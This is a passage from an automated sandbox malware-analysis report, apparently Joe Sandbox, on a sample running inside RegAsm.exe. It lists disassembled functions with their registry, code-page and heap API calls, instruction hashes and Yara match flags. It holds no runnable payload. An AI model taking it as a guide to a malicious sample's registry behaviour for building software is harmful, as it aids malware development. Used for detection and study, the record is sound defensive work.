                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                • RegQueryValueExA.KERNEL32 ref: 00413768
                                                • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                • RegQueryValueExA.KERNEL32 ref: 00413565
                                                • RegCloseKey.KERNEL32(?), ref: 00413570
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID:
                                                • API String ID: 1818849710-0
                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Info
                                                • String ID:
                                                • API String ID: 1807457897-3916222277
                                                • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                Function 0044EE44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Info
                                                • String ID:
                                                • API String ID: 1807457897-3916222277
                                                • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: pQG
                                                • API String ID: 176396367-3769108836
                                                • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: String
                                                • String ID: LCMapStringEx
                                                • API String ID: 2568140703-3893581201
                                                • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                Function 00448C33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String
                                                • String ID: LCMapStringEx
                                                • API String ID: 2568140703-3893581201
                                                • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                Function 00448B04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                Strings
                                                • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpin
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 2593887523-3084827643
                                                • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: FlsAlloc
                                                • API String ID: 2773662609-671089009
                                                • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                Function 00448790 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: FlsAlloc
                                                • API String ID: 2773662609-671089009
                                                • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: FlsAlloc
                                                • API String ID: 2742660187-671089009
                                                • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                Function 00438E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: FlsAlloc
                                                • API String ID: 2742660187-671089009
                                                • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID: @
                                                • API String ID: 1890195054-2766056989
                                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID:
                                                • API String ID: 546120528-0
                                                • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                Function 0044F199 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID:
                                                • API String ID: 546120528-0
                                                • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                • _free.LIBCMT ref: 10006CD7
                                                • _free.LIBCMT ref: 10006D0D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                Function 0044EFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                  • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                • _free.LIBCMT ref: 0044F050
                                                • _free.LIBCMT ref: 0044F086
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 2279764990-0
                                                • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00446227
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
